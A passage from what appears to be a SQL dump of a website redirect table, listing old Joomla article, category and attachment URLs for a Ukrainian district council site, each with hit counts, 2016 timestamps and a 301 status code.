00:00:00',301),(28153,'http://www.malyn-rayrada.org.ua/index.php?id=41:--27042012-&Itemid=78&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-03 05:15:59','0000-00-00 00:00:00',301),(28154,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=920:2013-02-04-08-13-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2016-04-03 05:18:01','0000-00-00 00:00:00',301),(28155,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=713:2012-06-14-15-13-57&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 05:22:17','0000-00-00 00:00:00',301),(28156,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 05:27:51','0000-00-00 00:00:00',301),(28157,'http://www.malyn-rayrada.org.ua/index.php?id=42:--16052012-&Itemid=80&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-04-03 05:28:20','0000-00-00 00:00:00',301),(28158,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1286:2014-04-23-06-48-27&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 05:28:49','0000-00-00 00:00:00',301),(28159,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=195:------------2010-&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 05:37:05','0000-00-00 00:00:00',301),(28160,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-03 05:42:37','0000-00-00 00:00:00',301),(28161,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=762:-210-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 05:55:22','0000-00-00 00:00:00',301),(28162,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=311:-v-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 06:09:35','0000-00-00 00:00:00',301),(28163,'http://www.malyn-rayrada.org.ua/attachments/article/1325/Програма','','','',1,0,'2016-04-03 06:14:32','0000-00-00 00:00:00',301),(28164,'http://www.malyn-rayrada.org.ua/attachments/article/1323/Програма','','','',1,0,'2016-04-03 06:15:16','0000-00-00 00:00:00',301),(28165,'http://www.malyn-rayrada.org.ua/attachments/article/1328/додаток','','','',1,0,'2016-04-03 06:15:25','0000-00-00 00:00:00',301),(28166,'http://www.malyn-rayrada.org.ua/attachments/article/1329/додаток','','','',1,0,'2016-04-03 06:15:46','0000-00-00 00:00:00',301),(28167,'http://www.malyn-rayrada.org.ua/attachments/article/1402/Підсумки','','','',1,0,'2016-04-03 06:16:41','0000-00-00 00:00:00',301),(28168,'http://www.malyn-rayrada.org.ua/attachments/article/1407/Програма','','','',1,0,'2016-04-03 06:17:00','0000-00-00 00:00:00',301),(28169,'http://www.malyn-rayrada.org.ua/attachments/article/1339/Програма','','','',1,0,'2016-04-03 06:17:19','0000-00-00 00:00:00',301),(28170,'http://www.malyn-rayrada.org.ua/attachments/article/1344/додаток','','','',1,0,'2016-04-03 06:17:45','0000-00-00 00:00:00',301),(28171,'http://www.malyn-rayrada.org.ua/attachments/article/1326/Програма','','','',1,0,'2016-04-03 06:18:13','0000-00-00 00:00:00',301),(28172,'http://www.malyn-rayrada.org.ua/attachments/article/1405/додаток','','','',1,0,'2016-04-03 06:19:25','0000-00-00 00:00:00',301),(28173,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=970:-90-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 07:02:32','0000-00-00 00:00:00',301),(28174,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=823:2012-11-14-16-52-28&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 07:02:33','0000-00-00 00:00:00',301),(28175,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=823:2012-11-14-16-52-28&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 07:08:05','0000-00-00 00:00:00',301),(28176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=15','','','',2,0,'2016-04-03 07:10:54','0000-00-00 00:00:00',301),(28177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=uk&limitstart=10','','','',2,0,'2016-04-03 07:11:53','0000-00-00 00:00:00',301),(28178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=920:2013-02-04-08-13-08&catid=11&lang=ru','','','',2,0,'2016-04-03 07:12:18','0000-00-00 00:00:00',301),(28179,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=733:-10-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 07:15:26','0000-00-00 00:00:00',301),(28180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=79:2010-08-03-07-32-55&catid=11:2010-06-05-14-33-33&Itemid=16&lang=en','','','',2,0,'2016-04-03 07:35:28','0000-00-00 00:00:00',301),(28181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=79:2010-08-03-07-32-55&catid=11&Itemid=16&lang=en','','','',2,0,'2016-04-03 07:35:43','0000-00-00 00:00:00',301),(28182,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=login','','http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=login','',1,0,'2016-04-03 08:00:55','0000-00-00 00:00:00',301),(28183,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=813:2012-11-12-16-44-40&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 08:11:22','0000-00-00 00:00:00',301),(28184,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1022:-lr-&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-03 08:54:44','0000-00-00 00:00:00',301),(28185,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=488:2011-12-02-06-34-46&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 09:22:39','0000-00-00 00:00:00',301),(28186,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=546:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 09:51:42','0000-00-00 00:00:00',301),(28187,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=594:-lr-&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-03 10:09:35','0000-00-00 00:00:00',301),(28188,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1161:2013-12-18-13-34-32&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 10:31:12','0000-00-00 00:00:00',301),(28189,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=819:2012-11-14-16-40-09&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 10:39:59','0000-00-00 00:00:00',301),(28190,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 10:41:47','0000-00-00 00:00:00',301),(28191,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1048:2013-07-10-05-53-06&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 10:53:08','0000-00-00 00:00:00',301),(28192,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=7','','','',1,0,'2016-04-03 11:15:33','0000-00-00 00:00:00',301),(28193,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=714:2012-06-14-15-15-43&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 11:39:01','0000-00-00 00:00:00',301),(28194,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=914:2013-01-23-13-21-28&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 11:52:23','0000-00-00 00:00:00',301),(28195,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=829:24-1600-l-r&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2016-04-03 12:17:08','0000-00-00 00:00:00',301),(28196,'http://www.malyn-rayrada.org.ua/index.php?id=32:2011-03-31-12-03-04&Itemid=14&lang=ru&option=com_content&view=category','','','',1,0,'2016-04-03 12:17:37','0000-00-00 00:00:00',301),(28197,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=796:2012-10-18-07-54-09&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 12:27:55','0000-00-00 00:00:00',301),(28198,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=731:2012-07-02-08-51-09&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 12:50:10','0000-00-00 00:00:00',301),(28199,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-04-03 13:01:53','0000-00-00 00:00:00',301),(28200,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=717:2012-06-14-15-22-29&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 13:33:43','0000-00-00 00:00:00',301),(28201,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 13:59:19','0000-00-00 00:00:00',301),(28202,'http://www.malyn-rayrada.org.ua/index.php?Itemid=9&catid=6:2010-06-05-12-52-17&id=6:2010-06-05-14-26-47&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 15:26:31','0000-00-00 00:00:00',301),(28203,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1261:2014-03-31-11-35-31&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 16:40:17','0000-00-00 00:00:00',301),(28204,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=734:-6-2012-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 16:48:52','0000-00-00 00:00:00',301),(28205,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=764:2012-09-26-12-58-07&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 16:48:53','0000-00-00 00:00:00',301),(28206,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1078:-2007-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 16:48:56','0000-00-00 00:00:00',301),(28207,'http://www.malyn-rayrada.org.ua/index.php?id=44&Itemid=83&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-03 16:48:56','0000-00-00 00:00:00',301),(28208,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=707:-231-280312-l-2012-r&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:02','0000-00-00 00:00:00',301),(28209,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:04','0000-00-00 00:00:00',301),(28210,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=841:2012-12-10-13-54-17&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:09','0000-00-00 00:00:00',301),(28211,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=778:2012-10-03-08-53-07&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:09','0000-00-00 00:00:00',301),(28212,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:20','0000-00-00 00:00:00',301),(28213,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1173:2014-01-15-10-37-18&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2016-04-03 16:49:27','0000-00-00 00:00:00',301),(28214,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=990:-2013-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-03 16:49:29','0000-00-00 00:00:00',301),(28215,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:32','0000-00-00 00:00:00',301),(28216,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=841:2012-12-10-13-54-17&Itemid=85&lang=en&option=com_content&view=article','','','',3,0,'2016-04-03 16:49:33','0000-00-00 00:00:00',301),(28217,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=841:2012-12-10-13-54-17&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 16:49:34','0000-00-00 00:00:00',301),(28218,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=40:--28032012-&id=597:-l-r-2011-&itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 16:50:17','0000-00-00 00:00:00',301),(28219,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=18:2010-06-06-10-06-41&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 16:53:04','0000-00-00 00:00:00',301),(28220,'http://www.malyn-rayrada.org.ua/index.php?Itemid=12&catid=7:2010-06-05-12-53-35&id=9:2010-06-05-15-10-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 16:53:05','0000-00-00 00:00:00',301),(28221,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=978:-6612-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 17:17:29','0000-00-00 00:00:00',301),(28222,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=990:-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 17:32:15','0000-00-00 00:00:00',301),(28223,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2014-01-06-08-19-15&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 17:32:21','0000-00-00 00:00:00',301),(28224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-03 17:36:55','0000-00-00 00:00:00',301),(28225,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=649:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 18:13:02','0000-00-00 00:00:00',301),(28226,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1035:2013-06-25-09-55-31&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 18:16:42','0000-00-00 00:00:00',301),(28227,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=345:2011-06-15-12-28-17&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 18:16:43','0000-00-00 00:00:00',301),(28228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=649:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 18:29:49','0000-00-00 00:00:00',301),(28229,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=39:-22022012-&id=565:2012-02-03-09-48-29&itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 18:46:14','0000-00-00 00:00:00',301),(28230,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=711:2012-06-14-15-09-26&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 19:31:39','0000-00-00 00:00:00',301),(28231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=179:2010-11-30-09-08-30&catid=11&Itemid=16&lang=en','','','',1,0,'2016-04-03 19:31:59','0000-00-00 00:00:00',301),(28232,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1279:2014-04-13-11-36-46&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 19:36:22','0000-00-00 00:00:00',301),(28233,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&lang=uk&option=com_content&view=article','','','',4,0,'2016-04-03 19:42:28','0000-00-00 00:00:00',301),(28234,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=544:2012-01-26-12-03-44&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 19:55:07','0000-00-00 00:00:00',301),(28235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=884:2012-12-24-10-46-13&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 20:00:04','0000-00-00 00:00:00',301),(28236,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=862:------qq&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 20:12:48','0000-00-00 00:00:00',301),(28237,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&id=48:--11032013-&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-03 20:12:49','0000-00-00 00:00:00',301),(28238,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=675:2012-05-17-09-49-52&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 20:56:42','0000-00-00 00:00:00',301),(28239,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=403:2011-09-29-05-41-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 21:04:51','0000-00-00 00:00:00',301),(28240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=191:2010-12-15-13-27-06&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 21:11:16','0000-00-00 00:00:00',301),(28241,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 21:11:17','0000-00-00 00:00:00',301),(28242,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=978:-6612-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 21:13:57','0000-00-00 00:00:00',301),(28243,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=279:2011-03-31-08-20-23&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 21:30:17','0000-00-00 00:00:00',301),(28244,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=191:2010-12-15-13-27-06&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 21:30:18','0000-00-00 00:00:00',301),(28245,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=36:2011-07-21-07-51-53&id=561:2012-02-02-08-58-39&itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 21:40:05','0000-00-00 00:00:00',301),(28246,'http://www.malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m/','','','',1,0,'2016-04-03 21:49:25','0000-00-00 00:00:00',301),(28247,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=270:-4-6-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-03 22:40:10','0000-00-00 00:00:00',301),(28248,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=642:2012-04-03-12-53-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-03 23:20:54','0000-00-00 00:00:00',301),(28249,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=327:2011-05-20-16-20-26&lang=en&option=com_content&view=article','','','',1,0,'2016-04-03 23:47:31','0000-00-00 00:00:00',301),(28250,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=728:2012-06-26-07-51-10&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 00:11:35','0000-00-00 00:00:00',301),(28251,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=229:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 00:13:35','0000-00-00 00:00:00',301),(28252,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=669:-2011-56-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 00:43:11','0000-00-00 00:00:00',301),(28253,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1276:2014-04-10-13-26-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 00:52:59','0000-00-00 00:00:00',301),(28254,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1004:2013-05-04-11-41-00&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 01:28:37','0000-00-00 00:00:00',301),(28255,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=36:2011-07-21-07-51-53&id=561:2012-02-02-08-58-39&itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 01:45:35','0000-00-00 00:00:00',301),(28256,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=764:2012-09-26-12-58-07&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 01:59:46','0000-00-00 00:00:00',301),(28257,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=412:-165-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 01:59:46','0000-00-00 00:00:00',301),(28258,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=38:--19122011-&id=523:2011-12-30-10-16-28&itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2016-04-04 02:19:02','0000-00-00 00:00:00',301),(28259,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=670:2012-05-08-05-15-51&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 02:27:30','0000-00-00 00:00:00',301),(28260,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=791:2012-10-17-06-06-34&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 02:58:15','0000-00-00 00:00:00',301),(28261,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=716:2012-06-14-15-19-24&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 03:34:32','0000-00-00 00:00:00',301),(28262,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=740:-lr-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 03:34:49','0000-00-00 00:00:00',301),(28263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1294:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 03:35:28','0000-00-00 00:00:00',301),(28264,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=313:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 04:19:20','0000-00-00 00:00:00',301),(28265,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=276:---4-----6--25032011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 04:43:37','0000-00-00 00:00:00',301),(28266,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1000:1&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 04:52:32','0000-00-00 00:00:00',301),(28267,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=579:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 05:07:10','0000-00-00 00:00:00',301),(28268,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1019:2013-06-06-11-26-38&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 05:58:55','0000-00-00 00:00:00',301),(28269,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=632:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 05:58:56','0000-00-00 00:00:00',301),(28270,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=448:-2011-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 06:22:07','0000-00-00 00:00:00',301),(28271,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=825:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 06:22:31','0000-00-00 00:00:00',301),(28272,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=706:-qq-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 06:36:28','0000-00-00 00:00:00',301),(28273,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=644:2012-04-04-09-52-48&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 07:15:51','0000-00-00 00:00:00',301),(28274,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=568:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 07:34:48','0000-00-00 00:00:00',301),(28275,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=597:-l-r-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 07:49:22','0000-00-00 00:00:00',301),(28276,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=192:2010-12-15-13-29-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 07:56:17','0000-00-00 00:00:00',301),(28277,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=981:2013-04-03-07-23-01&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 08:12:13','0000-00-00 00:00:00',301),(28278,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=346:2011-06-15-12-31-02&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 08:14:31','0000-00-00 00:00:00',301),(28279,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 08:40:53','0000-00-00 00:00:00',301),(28280,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1206:-------l---28r&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 09:26:32','0000-00-00 00:00:00',301),(28281,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=681:16-13-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 09:46:58','0000-00-00 00:00:00',301),(28282,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=193:------------2009-2010-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 09:48:02','0000-00-00 00:00:00',301),(28283,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=991:2013-04-22-08-24-54&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 09:49:20','0000-00-00 00:00:00',301),(28284,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=640:2012-04-03-12-44-22&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 09:56:40','0000-00-00 00:00:00',301),(28285,'http://www.malyn-rayrada.org.ua/index.php?Itemid=78&catid=41:--27042012-&id=664:-------------l-r-lr&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 11:03:16','0000-00-00 00:00:00',301),(28286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=540:-2010-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 11:03:43','0000-00-00 00:00:00',301),(28287,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=40:--28032012-&id=597:-l-r-2011-&itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 11:03:52','0000-00-00 00:00:00',301),(28288,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1268:---------------l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 11:43:34','0000-00-00 00:00:00',301),(28289,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=705:-l-r&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-04 12:08:00','0000-00-00 00:00:00',301),(28290,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=735:2012-07-18-13-32-43&lang=uk&option=com_content&view=article','','','',2,0,'2016-04-04 13:00:01','0000-00-00 00:00:00',301),(28291,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1210:2014-02-03-13-20-51&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 13:22:29','0000-00-00 00:00:00',301),(28292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=778:2012-10-03-08-53-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 13:22:30','0000-00-00 00:00:00',301),(28293,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=313:-2011-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 13:56:22','0000-00-00 